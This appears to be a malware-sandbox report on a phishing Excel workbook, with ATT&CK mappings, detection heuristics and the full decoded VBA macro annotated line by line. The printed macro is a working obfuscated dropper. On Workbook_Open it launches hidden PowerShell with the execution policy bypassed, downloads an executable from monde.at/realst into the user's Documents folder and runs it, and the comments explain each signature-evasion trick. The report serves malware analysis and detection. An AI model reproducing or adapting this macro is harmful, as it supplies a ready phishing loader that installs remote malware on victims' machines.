MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution — note: nothing in the extracted macro exploits a software vulnerability; execution depends on the user enabling macros (Workbook_Open → Shell()), so T1204.002 User Execution: Malicious File, together with T1059.001 PowerShell and T1059.003 Windows Command Shell for the second stage, describes the observed behaviour more precisely.
The sample contains a Workbook_Open macro that uses the Shell() function to run cmd.exe /c, which launches PowerShell with -NoLogo, -NoExit, -NonInteractive, -WindowStyle hidden, -ExecutionPolicy bypass and -NoProfile (all case-mangled and partly abbreviated, e.g. -WInDO, -EXecUtionP). The PowerShell script is assembled from dozens of short string fragments spread across randomly named VBA functions, and is further obscured with PowerShell format-operator (-f) reordering and backtick escapes so that cmd.exe, New-Object, System.Net.WebClient, DownloadFile, GetFolderPath, Start-Process and sleep never appear as literal strings. Once reassembled it stores [Environment] in a variable (bXzO91), resolves the user's Documents folder via GetFolderPath('MyDocuments') into $lenovo, then loops — sleeping 41 seconds per iteration until the call succeeds (do{...}while(!$?)) — calling WebClient.DownloadFile to fetch 'http://monde.at/realst' into <Documents>\<random integer>.exe (the integer comes from VBA Rnd, so the file name changes every run) and finally executes it with Start-Process. The Japanese text in the document body serves as a lure to encourage macro execution. Durable indicators are the URL monde.at/realst, the cmd.exe → powershell.exe process chain with -ExecutionPolicy bypass and a hidden window, the 41-second retry loop and the -f/backtick obfuscation pattern — not the macro's function names or the dropped-file name.
Heuristics 4
-
ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELL — Shell() call in VBA (here used to launch cmd.exe /c powershell …; see Workbook_Open in the extracted macro)
-
Workbook_Open macro high OLE_VBA_WBOPEN — Workbook_Open macro (auto-executes as soon as the workbook is opened with macros enabled; no further user interaction required)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2508 bytes |

SHA-256 of macros.bas (the carved, decoded VBA source — not the original workbook): b6b00bc53f056c7c4fbfbb432485b95c951d9fe0465641003eb92799fcbb858b
Preview script — first 1,000 lines of the extracted script (two modules are concatenated: ThisWorkbook, which holds all the logic, and an empty Sheet1 module)
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Fragment of the PowerShell command: the (backtick-laced) type name handed to
' New-Object. The pieces concatenate to  sY`STem.Net.`w`EBcl`IE  and
' libocountries appends "nT". PowerShell drops a backtick in front of an
' ordinary letter when it parses a bare word, so this presumably resolves to
' System.Net.WebClient - confirm in a sandbox. The backticks and case-mangling
' appear to be there only to break literal-string signatures.
Function sheetunderground()
sheetunderground = "sY`STe" + "m.Ne" + "t.`w`E" + "Bc" + "l`IE"
End Function
' Produces the file-name stem for the dropped executable. Randomize re-seeds
' VBA's generator, Int(Rnd * 9437006#) yields an integer in 0..9437005, and it
' is returned through a String so it can be spliced straight into the command
' (see picassoweb). The name therefore differs on every run, which is why the
' dropped-file path is not a stable indicator.
Function starsunfire()
Dim gardengrass As String
Randomize
gardengrass = Int(Rnd * 9437006#)
starsunfire = gardengrass
End Function
' Top of the string builder: assembles the complete command line that
' Workbook_Open passes to Shell(). Read left to right the pieces spell
'   cmd.eXe /c " POweRsHElL -noLOGO -NOeXIt -noNINTERAcTIV -WInDO hiDden
'   -EXecUtionP bYpAss -nOpROFil "<script>
' with the PowerShell script contributed, in order, by ostinmuffa, staloneumo,
' libocountries and picassoweb. Mixing + and & is harmless here: + binds
' tighter than & in VBA, but every operand is a string, so the result is plain
' left-to-right concatenation either way. The abbreviated switch names
' (-WInDO, -EXecUtionP, -nOpROFil, -noNINTERAcTIV) rely on powershell.exe
' accepting unambiguous parameter prefixes.
Function fabinachii()
fabinachii = "cm" + ffmulti + "c "" PO" + "weRsH" + dellpacket & ostinmuffa + staloneumo + libocountries & picassoweb
End Function
' Middle of the launcher token: "cm" + this + "c " spells  cmd.eXe /c  in
' fabinachii. Splitting the executable name across three functions apparently
' exists so that no single string literal in the module contains "cmd.exe".
Function ffmulti()
ffmulti = "d.e" + "Xe /"
End Function
' Tail of the PowerShell script. starsunfire is called exactly once, so the
' same random integer <n> is used for both the download target and the
' Start-Process argument. holeblackdeep completes the URL opened by
' libocountries ("'ht'+") -> http://monde.at/realst, closes
' DownloadFile.Invoke(<url>, "$lenovo\\<n>.exe") and begins "}wh";
' fantaandcola finishes it as "}while(!$?);" - keep retrying (after the 41 s
' sleep in ostinmuffa) until DownloadFile succeeds - and then runs
' &("Start-Process") $LEnOvo\<n>.eXE, the -f 'ro','Start-P','cess' trick
' reassembling Start-Process so the cmdlet name never appears literally.
' Note the doubled backslash in the download path: the first literal ends
' with "\" and a separate "\" is appended before <n>; Windows path handling
' presumably tolerates it - confirm. In the VBA source each \"" is a
' backslash followed by an escaped double quote; the backslash survives into
' the command line so the quote reaches PowerShell inside the
' cmd.exe /c "..." argument. The final """"" emits two closing quotes (script
' argument and /c argument).
' inextimer, holeblackdeep and fantaandcola are never declared (no Option
' Explicit in the extracted module), so they are implicit Variants.
Function picassoweb()
inextimer = starsunfire
holeblackdeep = "'tp:'+'//'+'mo'+'nde.at/r'+'eal'+'st'),\""$lenovo\" + "\" + inextimer + ".e" + "xe\"")}wh"
fantaandcola = "ile(!$?);" + "&(\""{1}{0}{2}\""-f'ro','S" + "tart-P','cess') $LEnOvo\" + inextimer + ".e" + "XE"""""
picassoweb = holeblackdeep + fantaandcola
End Function
' Start of the PowerShell script. "Fil " completes -nOpROFil (-NoProfile) and
' the escaped "" opens the quoted script argument. Then
'   Sv bXzO91 ([tYPe]("{2}{1}{0}"-F 'MenT','IroN','ENv'))
' -> Set-Variable bXzO91 [Environment] (the -F operator reorders the pieces
' into "ENvIroNMenT"), and
'   do{ .("{1}{0}" -f 'p','slee') 41; $lenovo = (ge
' opens the retry loop: "slee"+"p" -> sleep (Start-Sleep) 41, a 41-second
' delay on every iteration - presumably to outlast short sandbox timeouts -
' and starts the assignment that staloneumo completes ("ge" + "T-chilDITEm"
' -> Get-ChildItem). The loop condition lives in picassoweb.
Function ostinmuffa()
ostinmuffa = "Fil ""Sv bXzO9" + "1 ([tYPe](\""{2}" + "{1}{0}\""-F 'Me" + "nT','IroN','ENv')); d" + "o{.(\""{1}{0}\"" -f'p','s" + "lee') 41;$lenovo = (ge"
End Function
' PowerShell host switches, case-mangled and partly abbreviated. "ElL"
' completes the PO+weRsH prefix from fabinachii; the rest reads
'   -noLOGO -NOeXIt -noNINTERAcTIV -WInDO hiDden -EXecUtionP bYpAss -nOpRO
' i.e. -NoLogo -NoExit -NonInteractive -WindowStyle hidden -ExecutionPolicy
' bypass -NoProfile (completed by "Fil" in ostinmuffa). -NoExit keeps the
' hidden PowerShell process resident after the script finishes; a hidden
' window plus -ExecutionPolicy bypass is a well-known anchor for command-line
' telemetry detections.
Function dellpacket()
dellpacket = "ElL -noLOGO -NOeXIt -noNI" + "NTERAcTIV -WInDO hiDd" + "en -EXecUt" + "ionP bYpAss -nOpRO"
End Function
' Auto-run hook: Excel fires Workbook_Open as soon as the file is opened with
' macros enabled - no further user interaction is needed. fabinachii builds
' the full cmd.exe /c "powershell ..." line and Shell() launches it. The
' second argument is the MSForms constant fmTabOrientationTop, which has
' nothing to do with window styles; its numeric value (0) matches vbHide, so
' the console window is presumably hidden - confirm. Using an unrelated
' constant avoids the literal vbHide that many macro heuristics key on.
Sub Workbook_Open()
Shell fabinachii, fmTabOrientationTop
End Sub
' Middle of the PowerShell script: the download call. The leading "3}{0}{2}"
' completes the "{1}{" that staloneumo ends with, giving
'   (.("{1}{3}{0}{2}" -f 'c','New-Obj','t','e') <type>)."do`WnLOaDF`I`lE"."iN`VoKe"(('ht'+
' where the -f pieces reorder to New-Object, <type> is sheetunderground +
' "nT" (System.Net.WebClient once the backticks are stripped - confirm) and
' the method names DownloadFile / Invoke are likewise backtick-split. "('ht'+"
' opens the URL that picassoweb finishes as http://monde.at/realst.
' hawaiiposition is never declared - implicit Variant.
Function libocountries()
hawaiiposition = "nT" + ").\""d" + "o`" + "Wn"
libocountries = "3}{0" + "}{2}\"" -f'c" + "','Ne" + "w-O" + "bj" + "','t','e') " + sheetunderground + hawaiiposition + "LO" + "aDF`I`lE\"".\""iN`Vo" + "Ke\""(('ht'+"
End Function
' Resolves the drop directory. Continues the "$lenovo = (ge" left open by
' ostinmuffa:
'   T-chilDITEm VaRiABle:bxzo91 ).vaLUe::("{2}{0}{3}{1}"-f 'tF','rPath','Ge','olde').Invoke(('My'+'Documents'));(.("{1}{
' -> Get-ChildItem Variable:bxzo91 reads back the [Environment] type stored
' by Set-Variable (PowerShell variable names are case-insensitive, hence
' bXzO91 vs bxzo91), the -f pieces reorder to GetFolderPath, so $lenovo
' becomes [Environment]::GetFolderPath('MyDocuments') - the user's Documents
' folder. The trailing "(.("{1}{" is completed by libocountries (New-Object).
' depodeposit is never declared - implicit Variant.
Function staloneumo()
depodeposit = "e(('M" + "y'+'D"
staloneumo = "T-c" + "hil" + "D" + "IT" + "Em Va" + "R" + "iAB" + "le:bx" + "zo91 ).v" + "aL" + "Ue:" + ":(\""{2}{0" + "}{3}{1}\""-f 't" + "F','rP" + "ath','G" + "e','ol" + "de').Invok" + depodeposit + "o'+'cu'+'me'+'nts'));(.(\""{1}{"
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True